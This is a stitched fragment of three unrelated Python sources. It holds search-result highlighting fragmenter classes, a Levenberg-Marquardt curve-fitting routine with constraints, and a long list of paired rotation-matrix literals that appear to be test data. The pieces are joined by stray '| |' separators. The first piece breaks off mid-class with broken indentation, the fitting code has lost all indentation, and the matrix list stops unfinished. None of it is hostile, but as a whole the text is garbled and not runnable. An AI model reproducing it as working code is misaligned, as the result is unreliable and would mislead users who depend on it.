        # Since no terms in the "text" field matched, we get no fragments back
        assert r[0].highlights("text") == ""

        # If we lower the minimum score to 0, we get a fragment even though it
        # has no matching terms
        assert r[0].highlights("text", minscore=0) == "This is the text field."
    """

    def __init__(self, charlimit=DEFAULT_CHARLIMIT):
        self.charlimit = charlimit

    def fragment_tokens(self, text, tokens):
        """Return a single :class:`Fragment` spanning the whole text,
        carrying copies of all matched tokens (up to ``charlimit``).
        """
        limit = self.charlimit
        matched = []
        for token in tokens:
            # Stop scanning once past the character limit, if one is set
            if limit and token.endchar > limit:
                break
            if token.matched:
                matched.append(token.copy())
        return [Fragment(text, matched)]
# Backwards compatibility
NullFragmeter = WholeFragmenter
class SentenceFragmenter(Fragmenter):
    """Breaks the text up on sentence end punctuation characters
    (".", "!", or "?"). This object works by looking in the original text for a
    sentence end as the next character after each token's 'endchar'.

    When highlighting with this fragmenter, you should use an analyzer that
    does NOT remove stop words, for example::

        sa = StandardAnalyzer(stoplist=None)
    """

    def __init__(self, maxchars=200, sentencechars=".!?",
                 charlimit=DEFAULT_CHARLIMIT):
        """
        :param maxchars: The maximum number of characters allowed in a
            fragment.
        :param sentencechars: characters treated as end-of-sentence marks.
        :param charlimit: stop fragmenting once a token ends past this offset
            in the text.
        """
        self.maxchars = maxchars
        self.sentencechars = frozenset(sentencechars)
        self.charlimit = charlimit

    def fragment_tokens(self, text, tokens):
        """Yield one :class:`Fragment` per sentence that contains at least one
        matched token and does not exceed ``maxchars``.
        """
        maxchars = self.maxchars
        sentencechars = self.sentencechars
        charlimit = self.charlimit
        textlen = len(text)

        # startchar of first token in the current sentence
        first = None
        # Buffer for matched tokens in the current sentence
        tks = []
        endchar = None
        # Number of chars in the current sentence
        currentlen = 0

        for t in tokens:
            startchar = t.startchar
            endchar = t.endchar
            if charlimit and endchar > charlimit:
                break

            if first is None:
                # Remember the startchar of the first token in a sentence
                first = startchar
                currentlen = 0

            tlength = endchar - startchar
            currentlen += tlength

            if t.matched:
                tks.append(t.copy())

            # If the character after the current token is end-of-sentence
            # punctuation, finish the sentence and reset
            if endchar < textlen and text[endchar] in sentencechars:
                # Don't break for two periods in a row (e.g. ignore "...")
                if endchar + 1 < textlen and text[endchar + 1] in sentencechars:
                    continue

                # If the sentence had matches and it's not too long, yield it
                # as a token
                if tks and currentlen <= maxchars:
                    yield mkfrag(text, tks, startchar=first, endchar=endchar)
                # Reset the counts
                tks = []
                first = None
                currentlen = 0

        # If we get to the end of the text and there's still a sentence
        # in the buffer, yield it
        if tks:
            yield mkfrag(text, tks, startchar=first, endchar=endchar)
class ContextFragmenter(Fragmenter):
    """Looks for matched terms and aggregates them with their surrounding
    context.
    """

    def __init__(self, maxchars=200, surround=20, charlimit=DEFAULT_CHARLIMIT):
        """
        :param maxchars: The maximum number of characters allowed in a
            fragment.
        :param surround: The number of extra characters of context to add both
            before the first matched term and after the last matched term.
        :param charlimit: stop fragmenting once a token ends past this offset
            in the text.
        """
        self.maxchars = maxchars
        self.surround = surround
        self.charlimit = charlimit

    def fragment_tokens(self, text, tokens):
        """Yield :class:`Fragment` objects, each grouping nearby matched
        tokens with up to ``surround`` characters of context on either side.
        """
        maxchars = self.maxchars
        surround = self.surround
        charlimit = self.charlimit

        # startchar of the first token in the fragment
        first = None
        # Stack of startchars
        firsts = deque()
        # Each time we see a matched token, we reset the countdown to finishing
        # the fragment. This also indicates whether we're currently inside a
        # fragment (< 0 not in fragment, >= 0 in fragment)
        countdown = -1
        # Tokens in current fragment
        tks = []
        endchar = None
        # Number of chars in the current fragment
        currentlen = 0

        for t in tokens:
            startchar = t.startchar
            endchar = t.endchar
            tlength = endchar - startchar
            if charlimit and endchar > charlimit:
                break

            if countdown < 0 and not t.matched:
                # We're not in a fragment currently, so just maintain the
                # "charsbefore" buffer
                firsts.append(startchar)
                while firsts and endchar - firsts[0] > surround:
                    firsts.popleft()
            elif currentlen + tlength > maxchars:
                # We're in a fragment, but adding this token would put us past
                # the maximum size. Zero the countdown so the code below will
                # cause the fragment to be emitted
                countdown = 0
            elif t.matched:
                # Start/restart the countdown
                countdown = surround
                # Remember the first char of this fragment
                if first is None:
                    if firsts:
                        first = firsts[0]
                    else:
                        first = startchar
                    # Add on unused front context
                    countdown += surround
                tks.append(t.copy())

            # If we're in a fragment...
            if countdown >= 0:
                # Update the counts
                currentlen += tlength
                countdown -= tlength

                # If the countdown is expired
                if countdown <= 0:
                    # Finish the fragment
                    yield mkfrag(text, tks, startchar=first, endchar=endchar)
                    # Reset the counts
                    tks = []
                    firsts = deque()
                    first = None
                    currentlen = 0

        # If there's a fragment left over at the end, yield it
        if tks:
            yield mkfrag(text, tks, startchar=first, endchar=endchar)
class PinpointFragmenter(Fragmenter):
    """This is a NON-RETOKENIZING fragmenter. It builds fragments from the
    positions of the matched terms.
    """

    def __init__(self, maxchars=200, surround=20, autotrim=False,
                 charlimit=DEFAULT_CHARLIMIT):
        """
        :param maxchars: The maximum number of characters allowed in a
            fragment.
        :param surround: The number of extra characters of context to add both
            before the first matched term and after the last matched term.
        :param autotrim: automatically trims text before the first space and
            after the last space in the fragments, to try to avoid truncated
            words at the start and end. For short fragments or fragments with
            long runs between spaces this may give strange results.
        :param charlimit: stop fragmenting once a match ends past this offset
            in the text.
        """
        self.maxchars = maxchars
        self.surround = surround
        self.autotrim = autotrim
        self.charlimit = charlimit

    def must_retokenize(self):
        # Match positions are enough; no re-analysis of the stored text needed.
        return False

    def fragment_tokens(self, text, tokens):
        """Filter the stream down to matched tokens and delegate to
        :meth:`fragment_matches`.
        """
        matched = [t for t in tokens if t.matched]
        return self.fragment_matches(text, matched)

    @staticmethod
    def _autotrim(fragment):
        # Move the fragment boundaries inward to the nearest spaces so the
        # fragment does not start or end mid-word...
        text = fragment.text
        startchar = fragment.startchar
        endchar = fragment.endchar
        firstspace = text.find(" ", startchar, endchar)
        if firstspace > 0:
            startchar = firstspace + 1
        lastspace = text.rfind(" ", startchar, endchar)
        if lastspace > 0:
            endchar = lastspace
        # ...but never trim away part of an actual match.
        if fragment.matches:
            startchar = min(startchar, fragment.matches[0].startchar)
            endchar = max(endchar, fragment.matches[-1].endchar)
        fragment.startchar = startchar
        fragment.endchar = endchar

    def fragment_matches(self, text, tokens):
        """Yield :class:`Fragment` objects built by greedily merging matches
        that are within ``surround`` characters of each other, up to
        ``maxchars`` per fragment.
        """
        maxchars = self.maxchars
        surround = self.surround
        autotrim = self.autotrim
        charlimit = self.charlimit

        j = -1

        for i, t in enumerate(tokens):
            # Skip tokens already consumed by a previous fragment
            if j >= i:
                continue
            j = i
            left = t.startchar
            right = t.endchar
            if charlimit and right > charlimit:
                break

            currentlen = right - left
            # Absorb following matches while they stay close enough and the
            # fragment stays under maxchars.  (Note: ``next`` shadows the
            # builtin here.)
            while j < len(tokens) - 1 and currentlen < maxchars:
                next = tokens[j + 1]
                ec = next.endchar
                if ec - right <= surround and ec - left <= maxchars:
                    j += 1
                    right = ec
                    currentlen += (ec - next.startchar)
                else:
                    break

            # Pad with surrounding context, clamped to the text bounds
            left = max(0, left - surround)
            right = min(len(text), right + surround)

            fragment = Fragment(text, tokens[i:j + 1], left, right)
            if autotrim:
                self._autotrim(fragment)
            yield fragment
# Fragment scorers
class FragmentScorer(object):
    # Marker base class for fragment scorers.  Concrete scorers are callables
    # taking a fragment and returning a numeric score (see the subclass below).
    pass
class BasicFragmentScorer(FragmentScorer):
def __call__(self, f):
# Add up the boosts for the | |
it, however, if there are
# points to be excluded, one has to be able to exclude them.
# We can only hope that the sequence is properly arranged
ydata = ydata[idx]
xdata = xdata[idx]
sigma = sigma[idx]
idx = numpy.isfinite(xdata)
filter_xdata = False
if False in idx:
# What to do?
try:
# Let's see if the function is able to deal with non-finite data
msg = "Checking if function can deal with non-finite data"
_logger.debug(msg)
evaluation = model(xdata, *parameters)
function_call_counter += 1
if evaluation.shape != ydata.shape:
if evaluation.size == ydata.size:
msg = "Supplied function does not return a proper array of floats."
msg += "\nFunction should be rewritten to return a 1D array of floats."
msg += "\nTrying to reshape output."
_logger.warning(msg)
evaluation.shape = ydata.shape
if False in numpy.isfinite(evaluation):
msg = "Supplied function unable to handle non-finite x data"
msg += "\nAttempting to filter out those x data values."
_logger.warning(msg)
filter_xdata = True
else:
filter_xdata = False
evaluation = None
except:
# function cannot handle input data
filter_xdata = True
if filter_xdata:
if xdata.size != ydata.size:
raise ValueError("xdata contains non-finite data that cannot be filtered")
else:
# we leave the xdata as they where
old_shape = xdata.shape
xdata.shape = ydata.shape
idx0 = numpy.isfinite(xdata)
xdata.shape = old_shape
ydata = ydata[idx0]
xdata = xdata[idx]
sigma = sigma[idx0]
weight = 1.0 / (sigma + numpy.equal(sigma, 0))
weight0 = weight * weight
nparameters = len(parameters)
if epsfcn is None:
epsfcn = numpy.finfo(numpy.float64).eps
else:
epsfcn = max(epsfcn, numpy.finfo(numpy.float64).eps)
# check if constraints have been passed as text
constrained_fit = False
if constraints is not None:
# make sure we work with a list of lists
input_constraints = constraints
tmp_constraints = [None] * len(input_constraints)
for i in range(nparameters):
tmp_constraints[i] = list(input_constraints[i])
constraints = tmp_constraints
for i in range(nparameters):
if hasattr(constraints[i][0], "upper"):
txt = constraints[i][0].upper()
if txt == "FREE":
constraints[i][0] = CFREE
elif txt == "POSITIVE":
constraints[i][0] = CPOSITIVE
elif txt == "QUOTED":
constraints[i][0] = CQUOTED
elif txt == "FIXED":
constraints[i][0] = CFIXED
elif txt == "FACTOR":
constraints[i][0] = CFACTOR
constraints[i][1] = int(constraints[i][1])
elif txt == "DELTA":
constraints[i][0] = CDELTA
constraints[i][1] = int(constraints[i][1])
elif txt == "SUM":
constraints[i][0] = CSUM
constraints[i][1] = int(constraints[i][1])
elif txt in ["IGNORED", "IGNORE"]:
constraints[i][0] = CIGNORED
else:
#I should raise an exception
raise ValueError("Unknown constraint %s" % constraints[i][0])
if constraints[i][0] > 0:
constrained_fit = True
if constrained_fit:
if full_output is None:
_logger.info("Recommended to set full_output to True when using constraints")
# Levenberg-Marquardt algorithm
fittedpar = parameters.__copy__()
flambda = 0.001
iiter = max_iter
#niter = 0
last_evaluation=None
x = xdata
y = ydata
chisq0 = -1
iteration_counter = 0
while (iiter > 0):
weight = weight0
"""
I cannot evaluate the initial chisq here because I do not know
if some parameters are to be ignored, otherways I could do it as follows:
if last_evaluation is None:
yfit = model(x, *fittedpar)
last_evaluation = yfit
chisq0 = (weight * pow(y-yfit, 2)).sum()
and chisq would not need to be recalculated.
Passing the last_evaluation assumes that there are no parameters being
ignored or not between calls.
"""
iteration_counter += 1
chisq0, alpha0, beta, internal_output = chisq_alpha_beta(
model, fittedpar,
x, y, weight, constraints=constraints,
model_deriv=model_deriv,
epsfcn=epsfcn,
left_derivative=left_derivative,
last_evaluation=last_evaluation,
full_output=True)
n_free = internal_output["n_free"]
free_index = internal_output["free_index"]
noigno = internal_output["noigno"]
fitparam = internal_output["fitparam"]
function_calls = internal_output["function_calls"]
function_call_counter += function_calls
#print("chisq0 = ", chisq0, n_free, fittedpar)
#raise
nr, nc = alpha0.shape
flag = 0
#lastdeltachi = chisq0
while flag == 0:
alpha = alpha0 * (1.0 + flambda * numpy.identity(nr))
deltapar = numpy.dot(beta, inv(alpha))
if constraints is None:
newpar = fitparam + deltapar [0]
else:
newpar = parameters.__copy__()
pwork = numpy.zeros(deltapar.shape, numpy.float64)
for i in range(n_free):
if constraints is None:
pwork [0] [i] = fitparam [i] + deltapar [0] [i]
elif constraints [free_index[i]][0] == CFREE:
pwork [0] [i] = fitparam [i] + deltapar [0] [i]
elif constraints [free_index[i]][0] == CPOSITIVE:
#abs method
pwork [0] [i] = fitparam [i] + deltapar [0] [i]
#square method
#pwork [0] [i] = (numpy.sqrt(fitparam [i]) + deltapar [0] [i]) * \
# (numpy.sqrt(fitparam [i]) + deltapar [0] [i])
elif constraints[free_index[i]][0] == CQUOTED:
pmax = max(constraints[free_index[i]][1],
constraints[free_index[i]][2])
pmin = min(constraints[free_index[i]][1],
constraints[free_index[i]][2])
A = 0.5 * (pmax + pmin)
B = 0.5 * (pmax - pmin)
if B != 0:
pwork [0] [i] = A + \
B * numpy.sin(numpy.arcsin((fitparam[i] - A)/B)+ \
deltapar [0] [i])
else:
txt = "Error processing constrained fit\n"
txt += "Parameter limits are %g and %g\n" % (pmin, pmax)
txt += "A = %g B = %g" % (A, B)
raise ValueError("Invalid parameter limits")
newpar[free_index[i]] = pwork [0] [i]
newpar = numpy.array(_get_parameters(newpar, constraints))
workpar = numpy.take(newpar, noigno)
yfit = model(x, *workpar)
if last_evaluation is None:
if len(yfit.shape) > 1:
msg = "Supplied function does not return a 1D array of floats."
msg += "\nFunction should be rewritten."
msg += "\nTrying to reshape output."
_logger.warning(msg)
yfit.shape = -1
function_call_counter += 1
chisq = (weight * pow(y-yfit, 2)).sum()
absdeltachi = chisq0 - chisq
if absdeltachi < 0:
flambda *= 10.0
if flambda > 1000:
flag = 1
iiter = 0
else:
flag = 1
fittedpar = newpar.__copy__()
lastdeltachi = 100 * (absdeltachi / (chisq + (chisq == 0)))
if iteration_counter < 2:
# ignore any limit, the fit *has* to be improved
pass
elif (lastdeltachi) < deltachi:
iiter = 0
elif absdeltachi < numpy.sqrt(epsfcn):
iiter = 0
_logger.info("Iteration finished due to too small absolute chi decrement")
chisq0 = chisq
flambda = flambda / 10.0
last_evaluation = yfit
iiter = iiter - 1
# this is the covariance matrix of the actually fitted parameters
cov0 = inv(alpha0)
if constraints is None:
cov = cov0
else:
# yet another call needed with all the parameters being free except those
# that are FIXED and that will be assigned a 100 % uncertainty.
new_constraints = copy.deepcopy(constraints)
flag_special = [0] * len(fittedpar)
for idx, constraint in enumerate(constraints):
if constraints[idx][0] in [CFIXED, CIGNORED]:
flag_special[idx] = constraints[idx][0]
else:
new_constraints[idx][0] = CFREE
new_constraints[idx][1] = 0
new_constraints[idx][2] = 0
chisq, alpha, beta, internal_output = chisq_alpha_beta(
model, fittedpar,
x, y, weight, constraints=new_constraints,
model_deriv=model_deriv,
epsfcn=epsfcn,
left_derivative=left_derivative,
last_evaluation=last_evaluation,
full_output=True)
# obtained chisq should be identical to chisq0
try:
cov = inv(alpha)
except LinAlgError:
_logger.critical("Error calculating covariance matrix after successful fit")
cov = None
if cov is not None:
for idx, value in enumerate(flag_special):
if value in [CFIXED, CIGNORED]:
cov = numpy.insert(numpy.insert(cov, idx, 0, axis=1), idx, 0, axis=0)
cov[idx, idx] = fittedpar[idx] * fittedpar[idx]
if not full_output:
return fittedpar, cov
else:
sigma0 = numpy.sqrt(abs(numpy.diag(cov0)))
sigmapar = _get_sigma_parameters(fittedpar, sigma0, constraints)
ddict = {}
ddict["chisq"] = chisq0
ddict["reduced_chisq"] = chisq0 / (len(yfit)-n_free)
ddict["covariance"] = cov0
ddict["uncertainties"] = sigmapar
ddict["fvec"] = last_evaluation
ddict["nfev"] = function_call_counter
ddict["niter"] = iteration_counter
return fittedpar, cov, ddict #, chisq/(len(yfit)-len(sigma0)), sigmapar,niter,lastdeltachi
def chisq_alpha_beta(model, parameters, x, y, weight, constraints=None,
model_deriv=None, epsfcn=None, left_derivative=False,
last_evaluation=None, full_output=False):
"""
Get chi square, the curvature matrix alpha and the matrix beta according to the input parameters.
If all the parameters are unconstrained, the covariance matrix is the inverse of the alpha matrix.
:param model: callable
The model function, f(x, ...). It must take the independent
variable as the first argument and the parameters to fit as
separate remaining arguments.
The returned value is a one dimensional array of floats.
:param parameters: N-length sequence
Values of parameters at which function and derivatives are to be calculated.
:param x: An M-length sequence.
The independent variable where the data is measured.
:param y: An M-length sequence
The dependent data --- nominally f(xdata, ...)
:param weight: M-length sequence
Weights to be applied in the calculation of chi square
As a reminder ``chisq = np.sum(weigth * (model(x, *parameters) - y)**2)``
:param constraints:
If provided, it is a 2D sequence of dimension (n_parameters, 3) where,
for each parameter denoted by the index i, the meaning is
- constraints[i][0]
- 0 - Free (CFREE)
- 1 - Positive | |
],
),
(
[
[0.97931, 0.0219899, 0.201169],
[-0.0159226, 0.99937, -0.0317288],
[-0.201739, 0.0278692, 0.979043],
],
[
[-0.980952, 0.00507266, -0.19419],
[0.00310821, 0.999941, 0.010419],
[0.194231, 0.00961706, -0.98091],
],
),
(
[
[0.999616, 0.00550326, -0.0271537],
[-0.0048286, 0.99968, 0.0248495],
[0.0272817, -0.0247088, 0.999322],
],
[
[-0.999689, -0.00054899, 0.0249588],
[-0.00125497, 0.999599, -0.0282774],
[-0.0249333, -0.0282998, -0.999289],
],
),
(
[
[0.998036, -0.00755259, -0.0621791],
[0.0417502, 0.820234, 0.570502],
[0.0466927, -0.571978, 0.818939],
],
[
[-0.999135, -0.0278203, 0.0309173],
[-0.00855238, 0.864892, 0.501886],
[-0.0407029, 0.501187, -0.864382],
],
),
(
[
[0.958227, 0.00271545, 0.285997],
[-0.00426128, 0.999979, 0.00478282],
[-0.285979, -0.00580174, 0.958218],
],
[
[-0.958726, 0.011053, -0.284121],
[0.0138068, 0.999875, -0.00769161],
[0.284001, -0.0112968, -0.958759],
],
),
(
[
[-0.804547, -0.48558, -0.341929],
[0.517913, -0.855425, -0.00382581],
[-0.290637, -0.180168, 0.939718],
],
[
[0.993776, -0.0469383, -0.101033],
[-0.110087, -0.274676, -0.955214],
[0.0170842, 0.96039, -0.278134],
],
),
(
[
[0.991875, -0.0022313, -0.127195],
[-0.00198041, 0.999454, -0.0329762],
[0.127199, 0.0329602, 0.991329],
],
[
[-0.992632, -0.0090772, 0.120844],
[-0.00870494, 0.999956, 0.00360636],
[-0.120871, 0.00252786, -0.992667],
],
),
(
[
[0.999305, -0.0252534, 0.0274367],
[0.026144, 0.999126, -0.0326002],
[-0.0265895, 0.0332948, 0.999092],
],
[
[-0.999314, -0.0038532, -0.0368519],
[-0.00441323, 0.999876, 0.0151263],
[0.036789, 0.0152787, -0.999207],
],
),
(
[
[0.999843, -0.00958823, 0.0148803],
[0.00982469, 0.999825, -0.0159002],
[-0.0147253, 0.0160439, 0.999763],
],
[
[-0.999973, 0.00673608, -0.00308692],
[-0.0067409, -0.999977, 0.00116827],
[-0.00307934, 0.00119013, 0.999995],
],
),
(
[
[0.981558, -0.00727741, 0.191028],
[-0.00866166, 0.996556, 0.0824708],
[-0.190971, -0.0826044, 0.978114],
],
[
[-0.980202, 0.0179519, -0.197188],
[0.00957606, 0.999014, 0.0433472],
[0.197772, 0.0406008, -0.979408],
],
),
(
[
[0.966044, 0.0143709, 0.257977],
[-0.0157938, 0.999869, 0.00344404],
[-0.257894, -0.00740153, 0.966145],
],
[
[-0.965532, 0.0100318, -0.260094],
[0.00950897, 0.999949, 0.00326797],
[0.260113, 0.000682242, -0.965579],
],
),
(
[
[0.999965, 0.00727991, -0.00412134],
[-0.00802642, 0.973769, -0.227397],
[0.00235781, 0.227422, 0.973794],
],
[
[-0.999877, 0.00698241, 0.0141441],
[0.0103867, 0.966295, 0.257228],
[-0.0118713, 0.257343, -0.966248],
],
),
(
[
[0.951385, -0.0297966, 0.306561],
[-0.0314555, 0.980706, 0.19294],
[-0.306395, -0.193204, 0.932092],
],
[
[-0.99981, 0.00389172, -0.0191159],
[-0.00386326, -0.999991, -0.00150593],
[-0.0191215, -0.00143146, 0.999816],
],
),
(
[
[0.986772, -0.120673, 0.10825],
[0.0543962, 0.875511, 0.480126],
[-0.152713, -0.467887, 0.870495],
],
[
[-0.991246, 0.125848, -0.0399414],
[-0.129021, -0.85897, 0.495507],
[0.0280503, 0.496321, 0.867686],
],
),
(
[
[-0.804799, -0.588418, 0.0778637],
[-0.514399, 0.756902, 0.403104],
[-0.296129, 0.284365, -0.911836],
],
[
[0.98676, -0.0939473, 0.132227],
[0.162179, 0.557277, -0.814336],
[0.0028177, 0.824995, 0.565135],
],
),
(
[
[0.878935, 0.115231, 0.462813],
[0.0845639, 0.917349, -0.388998],
[-0.469386, 0.381041, 0.796546],
],
[
[-0.869533, 0.00193279, -0.493873],
[-0.00419575, 0.999927, 0.0113007],
[0.493859, 0.0118986, -0.869462],
],
),
(
[
[0.951881, 0.20828, 0.224816],
[-0.305582, 0.700797, 0.644595],
[-0.023294, -0.682277, 0.730722],
],
[
[-0.999787, 0.0141074, -0.0151097],
[-0.000971554, 0.698061, 0.716038],
[0.0206489, 0.7159, -0.697898],
],
),
(
[
[0.999538, 0.0192173, 0.0235334],
[-0.0189064, 0.999732, -0.0133635],
[-0.0237839, 0.0129124, 0.999634],
],
[
[-0.999807, 0.00286378, -0.0194776],
[0.0026258, 0.999922, 0.0122308],
[0.0195111, 0.0121774, -0.999736],
],
),
(
[
[0.998468, 0.041362, -0.0367422],
[-0.0364453, 0.991404, 0.125658],
[0.0416238, -0.124127, 0.991393],
],
[
[-0.997665, -0.0658235, 0.0183602],
[0.0216855, -0.0501652, 0.998507],
[-0.064804, 0.99657, 0.0514739],
],
),
(
[
[0.995563, 0.0493669, 0.0801057],
[-0.0272233, 0.966027, -0.257002],
[-0.0900717, 0.253681, 0.963085],
],
[
[-0.999228, -0.034399, -0.0190572],
[0.0250208, -0.929986, 0.366743],
[-0.0303386, 0.365984, 0.930127],
],
),
(
[
[0.952898, 0.0122933, 0.303043],
[-0.00568444, 0.999727, -0.0226807],
[-0.303239, 0.0198898, 0.952707],
],
[
[-0.951155, 0.0127759, -0.308452],
[0.000612627, 0.999219, 0.0394978],
[0.308716, 0.0373795, -0.95042],
],
),
(
[
[0.923096, -0.000313887, 0.38457],
[0.00948258, 0.999714, -0.0219453],
[-0.384454, 0.0239044, 0.922835],
],
[
[-0.922662, -0.00403523, -0.385589],
[-0.0119834, 0.999762, 0.0182116],
[0.385424, 0.0214239, -0.922491],
],
),
(
[
[0.991575, 0.0945042, -0.0885834],
[-0.10112, 0.99216, -0.0734349],
[0.080949, 0.0817738, 0.993358],
],
[
[-0.990948, -0.127974, 0.0405639],
[0.096351, -0.467557, 0.878697],
[-0.0934839, 0.874651, 0.475655],
],
),
(
[
[0.997148, 0.010521, 0.0747407],
[-0.0079726, 0.999379, -0.034313],
[-0.0750553, 0.0336192, 0.996612],
],
[
[-0.996543, 0.00988805, -0.0825019],
[0.00939476, 0.999936, 0.0063645],
[0.0825595, 0.00556751, -0.996572],
],
),
(
[
[0.991261, 0.00474444, -0.131831],
[-0.00205841, 0.999788, 0.0205036],
[0.131901, -0.020053, 0.99106],
],
[
[-0.990924, 4.45275e-05, 0.134427],
[0.00614714, 0.998969, 0.0449827],
[-0.134286, 0.0454008, -0.989903],
],
),
(
[
[0.992266, -0.0947916, 0.0801474],
[0.100889, 0.992006, -0.0757987],
[-0.0723216, 0.0832984, 0.993897],
],
[
[-0.992701, 0.0817686, -0.0886652],
[-0.114283, -0.40263, 0.908203],
[0.0385633, 0.911704, 0.409035],
],
),
(
[
[0.99696, -0.00808565, -0.0774951],
[0.0585083, 0.734519, 0.676061],
[0.0514552, -0.67854, 0.732759],
],
[
[-0.9998, 0.0053398, -0.0193164],
[-0.0162677, -0.779206, 0.626556],
[-0.0117055, 0.626745, 0.779137],
],
),
(
[
[0.961501, 0.0133645, -0.274475],
[-0.016255, 0.999834, -0.00825889],
[0.274319, 0.0124025, 0.961559],
],
[
[-0.963687, 0.000179203, 0.267042],
[0.00670194, 0.999701, 0.023515],
[-0.266958, 0.0244509, -0.9634],
],
),
(
[
[0.99877, 0.0413462, -0.0273572],
[-0.0263673, 0.91029, 0.413131],
[0.0419844, -0.411902, 0.910261],
],
[
[-0.998035, -0.0613039, 0.0130407],
[-0.00146496, 0.230815, 0.972998],
[-0.0626594, 0.971065, -0.230452],
],
),
(
[
[0.999657, 0.0261608, 0.00141675],
[-0.0261957, 0.998937, 0.0379393],
[-0.000422719, -0.0379634, 0.999279],
],
[
[-0.998896, -0.0310033, -0.0353275],
[0.0315452, -0.999392, -0.0148857],
[-0.0348445, -0.0159846, 0.999265],
],
),
(
[
[0.77369, 0.0137861, 0.633415],
[-0.0186509, 0.999826, 0.00102049],
[-0.63329, -0.0126033, 0.773812],
],
[
[-0.773069, 0.0156632, -0.634129],
[0.00418312, 0.999799, 0.0195956],
[0.634308, 0.0124961, -0.772979],
],
),
(
[
[0.952827, -0.024521, -0.302522],
[-0.00541318, 0.9952, -0.0977158],
[0.303465, 0.0947439, 0.94812],
],
[
[-0.952266, -0.00806089, 0.305165],
[0.00351941, 0.999295, 0.037378],
[-0.305252, 0.0366678, -0.951567],
],
),
(
[
[-0.172189, 0.949971, 0.260587],
[-0.86961, -0.0223234, -0.493235],
[-0.462741, -0.311539, 0.829948],
],
[
[-0.672964, 0.0127645, -0.739567],
[0.00429523, 0.999902, 0.0133494],
[0.739664, 0.00580721, -0.672953],
],
),
(
[
[0.637899, -0.440017, 0.632036],
[-0.52883, 0.346333, 0.774849],
[-0.559842, -0.828516, -0.0117683],
],
[
[-0.0627307, -0.0314554, -0.997536],
[-0.733537, 0.679201, 0.0247117],
[0.67675, 0.733279, -0.0656804],
],
),
(
[
[0.998402, 0.00284932, -0.0564372],
[0.000393713, 0.998353, 0.0573683],
[0.0565077, -0.0572989, 0.996757],
],
[
[-0.997878, 0.000941416, 0.0651252],
[-2.16756e-05, 0.999891, -0.0147853],
[-0.065132, -0.0147552, -0.997768],
],
),
(
[
[0.9999, 0.0141438, -0.000431687],
[-0.0140882, 0.9979, 0.063225],
[0.00132502, -0.0632125, 0.997999],
],
[
[-0.999515, -0.0308197, -0.00482715],
[-0.00160551, -0.103741, 0.994605],
[-0.0311554, 0.994128, 0.10364],
],
),
(
[
[-0.201909, 0.0267804, 0.979038],
[-0.0159062, 0.999405, -0.0306179],
[-0.979275, -0.0217548, -0.201363],
],
[
[0.261235, 0.951613, -0.161839],
[0.0758567, 0.146901, 0.986239],
[0.962292, -0.269916, -0.03381],
],
),
(
[
[0.998335, -0.0191576, -0.0544038],
[0.0163271, 0.998513, -0.0520045],
[0.0553192, 0.0510297, 0.997164],
],
[
[-0.998811, -0.00846127, 0.0480344],
[-0.0051736, 0.997661, 0.0681593],
[-0.0484988, 0.0678295, -0.996519],
],
),
(
[
[0.999973, 0.00227282, -0.00699658],
[-0.00137504, 0.992062, 0.125744],
[0.00722684, -0.125731, 0.992038],
],
[
[-0.999995, -0.00337061, 4.25756e-05],
[-0.00333677, 0.991528, 0.129853],
[-0.00047993, 0.129852, -0.991534],
],
),
(
[
[0.998908, 0.0216581, -0.041392],
[-0.0327304, 0.956678, -0.289302],
[0.0333331, 0.290341, 0.956342],
],
[
[-0.998254, -0.0377592, 0.0454422],
[0.00744647, 0.682591, 0.730764],
[-0.0586112, 0.729825, -0.681118],
],
),
(
[
[0.999387, -0.0042571, -0.0347599],
[0.00485203, 0.999843, 0.017049],
[0.0346819, -0.0172072, 0.99925],
],
[
[-0.999976, 0.00260242, -0.00669664],
[-0.00250352, -0.999889, -0.0147361],
[-0.00673422, -0.0147175, 0.99987],
],
),
(
[
[0.906103, -0.398828, -0.141112],
[0.381512, 0.914475, -0.13485],
[0.182826, 0.0683519, 0.980766],
],
[
[-0.996568, -0.0321282, -0.0763021],
[-0.0823787, 0.476597, 0.875254],
[0.00824509, 0.878535, -0.477609],
],
),
(
[
[0.908356, 0.316033, -0.273884],
[-0.231421, -0.165634, -0.95865],
[-0.34833, 0.934178, -0.0773183],
],
[
[-0.999889, -0.0146322, -0.00295739],
[-0.0149238, 0.974974, 0.221815],
[-0.000362257, 0.221835, -0.975085],
],
),
(
[
[0.999507, -0.00834631, 0.0302637],
[0.00899248, 0.999733, -0.0212785],
[-0.030078, 0.0215401, 0.999315],
],
[
[-0.999538, 0.00785187, -0.0293621],
[0.00739788, 0.999852, 0.0155394],
[0.0294797, 0.0153149, -0.999448],
],
),
(
[
[0.999951, -0.00729441, -0.00672921],
[0.00313753, 0.87564, -0.482954],
[0.00941523, 0.48291, 0.87562],
],
[
[-0.999984, -0.005202, -0.00277372],
[0.00340465, -0.893745, 0.448565],
[-0.00481353, 0.448548, 0.893747],
],
),
(
[
[0.998028, -0.0569885, 0.0263322],
[0.0489091, 0.968801, 0.242967],
[-0.039357, -0.2412, 0.969677],
],
[
[-0.997066, 0.0422415, -0.0638525],
[-0.0760293, -0.448184, 0.890703],
[0.00900662, 0.892944, 0.45008],
],
),
(
[
[0.999745, 0.00860777, 0.0208747],
[-0.00827114, 0.999835, -0.0161595],
[-0.0210103, 0.0159827, 0.999651],
],
[
[-0.999576, 0.0148733, -0.0251161],
[0.0151027, 0.999846, -0.00898035],
[0.0249787, -0.00935575, -0.999646],
],
),
(
[
[0.91924, 0.0372116, -0.391934],
[-0.00675798, 0.996868, 0.0787959],
[0.393639, -0.0697837, 0.916613],
],
[
[-0.921919, 0.00882585, 0.387286],
[0.00588498, 0.999944, -0.00877866],
[-0.387342, -0.00581387, -0.921919],
],
),
(
[
[0.998324, -0.0029024, 0.0577924],
[0.00236766, 0.999954, 0.00931901],
[-0.0578167, -0.00916657, 0.998285],
],
[
[-0.99892, -0.0025688, -0.0464413],
[-0.00203721, 0.999932, -0.0114927],
[0.0464676, -0.0113855, -0.998857],
],
),
(
[
[0.993986, 0.0163462, -0.108279],
[-0.0612924, 0.902447, -0.426418],
[0.090746, 0.43049, 0.898022],
],
[
[-0.994519, -0.0767804, 0.0709843],
[0.0579273, 0.160607, 0.985318],
[-0.0870543, 0.984028, -0.15528],
],
),
(
[
[0.997351, 0.0715122, -0.0132892],
[-0.0707087, 0.996067, 0.0533919],
[0.0170551, -0.0523108, 0.998485],
],
[
[-0.997704, -0.066002, 0.015281],
[0.064101, -0.846657, 0.528267],
[-0.0219278, 0.528033, 0.848942],
],
),
(
[
[0.999839, 0.00714662, -0.0164633],
[-0.00859425, 0.99594, -0.0896085],
[0.0157561, 0.0897356, 0.995841],
],
[
